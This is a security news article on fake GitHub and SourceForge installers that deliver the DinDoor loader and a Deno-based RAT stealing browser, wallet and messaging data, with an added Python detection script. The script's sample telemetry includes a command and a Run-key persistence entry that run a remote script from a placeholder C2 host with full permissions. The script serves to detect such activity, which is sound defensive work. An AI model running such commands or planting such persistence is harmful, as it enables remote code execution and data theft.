Fake GitHub, SourceForge installers deliver DinDoor and Deno RAT
Compromised YouTube channels promoted fake GitHub and SourceForge installers that install the Deno runtime and load a DinDoor backdoor and a Deno-based RAT that steals browser and crypto wallet data.
Security researchers found attackers using compromised YouTube channels to redirect viewers to fake projects on GitHub and SourceForge. The repositories and linked installers impersonated popular tools and plugins to lure creators, gamers and AI users into running MSI files or copying terminal commands. The videos and repositories together have attracted more than 50,000 views.
The infection chain begins when users follow links in YouTube descriptions to GitHub or SourceForge repositories. Those repositories instruct users to run commands that download MSI installers or execute PowerShell scripts. The MSI droppers write command and PowerShell files to disk; the scripts then ensure Windows package managers are present and use them to install the official Deno runtime.
After Deno is installed, the Deno executable fetches a small launcher from a command-and-control (C2) server. That launcher retrieves and evaluates additional JavaScript stages in memory. The loader identified in the analysis is known as DinDoor. DinDoor registers a Run key to achieve persistence, sends system details to the C2 server, and pulls further payloads without writing those stages to disk.
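Detection logic for the two observable points in the chain described above (the official Deno binary being handed a remote script URL, and a Run key that re-launches it), as an added example that is not from the article or the researchers. The process events, Run values, paths and URL are constructed placeholders; `-A`, `--allow-all` and `--allow-run` are real Deno permission flags used here only as a severity hint.

```python
import re

# Constructed sample telemetry (not from the article): Sysmon-style process-creation
# events and HKCU\...\CurrentVersion\Run values. Paths and the URL are placeholders.
SAMPLE_PROCESSES = [
    {"Image": r"C:\Users\u\.deno\bin\deno.exe",
     "CommandLine": r'"C:\Users\u\.deno\bin\deno.exe" run -A https://c2.example.invalid/launcher.js',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Users\u\.deno\bin\deno.exe",
     "CommandLine": r"deno run --allow-net .\src\main.ts",   # legitimate local project
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\Git\bin\git.exe", "CommandLine": "git pull",
     "ParentImage": r"C:\Windows\explorer.exe"},
]
SAMPLE_RUN_VALUES = {  # value name -> command
    "Updater": r'"C:\Users\u\.deno\bin\deno.exe" run -A https://c2.example.invalid/launcher.js',
    "OneDrive": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}

DENO_RE = re.compile(r'(?:^|[\\/\s"])deno(?:\.exe)?(?:"|\s|$)', re.IGNORECASE)
URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)
# Real Deno flags that grant the script every capability or let it spawn subprocesses.
BROAD_PERMS = re.compile(r'(?<!\S)(?:-A|--allow-all|--allow-run)(?!\S)')


def deno_remote_script(cmdline):
    """Return the URL if a Deno command line takes its entry script from the network, else None."""
    if not DENO_RE.search(cmdline):
        return None
    m = URL_RE.search(cmdline)
    return m.group(0) if m else None


def scan_processes(events):
    """Flag Deno launched against a remote script; broad permissions raise the severity."""
    findings = []
    for ev in events:
        cmd = ev["CommandLine"]
        url = deno_remote_script(cmd)
        if url:
            sev = "high" if BROAD_PERMS.search(cmd) else "medium"
            findings.append(("deno_remote_script", sev, url, ev["ParentImage"]))
    return findings


def scan_run_keys(values):
    """Flag Run-key entries that re-launch Deno (the persistence the loader above relies on)."""
    return [(name, deno_remote_script(cmd) or "local")
            for name, cmd in values.items() if DENO_RE.search(cmd)]
```

The local `deno run` of a project file is deliberately not flagged, so the rule keys on where the script comes from rather than on Deno being present at all.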
One of the delivered payloads is a Deno-based remote access trojan. The RAT supports remote shell and PowerShell commands, file listing and retrieval, screenshot capture, clipboard read and modification, and execution of arbitrary binaries. Its data-stealing features target credentials and data from Chromium-based browsers and from more than 50 crypto wallet extensions and folders tied to wallet software such as Atomic Wallet, Exodus and Electrum. The RAT can also extract data from messaging clients including Telegram and Discord and create SOCKS5 proxy tunnels over WebSocket for additional access.
The RAT includes a peer-to-peer streaming mode that uses Microsoft Edge to carry live video. The agent spawns a hidden Edge process, connects via the Chrome DevTools Protocol, injects a small WebRTC page, encodes the victim’s screen as H.264, and sends frames directly to an operator’s browser over an encrypted WebRTC DataChannel. Signaling for the direct link is exchanged over the existing C2 WebSocket so the video stream does not transit the C2 server.
Researchers observed fake projects that mimicked ChatGPT, Claude, AutoTune, Kontakt and other software. Examples of malicious links include a GitHub repository for a fake Claude plugin and SourceForge project pages that impersonated a game installer and an AI watermark remover. Security teams reported the repositories and some were removed; researchers warn new accounts and repos continue to appear.
The researchers published technical indicators and recommend downloading software only from official vendor sites, avoiding unofficial or cracked builds, checking developer profiles and repository histories, and verifying digital signatures and publisher information on Windows installers.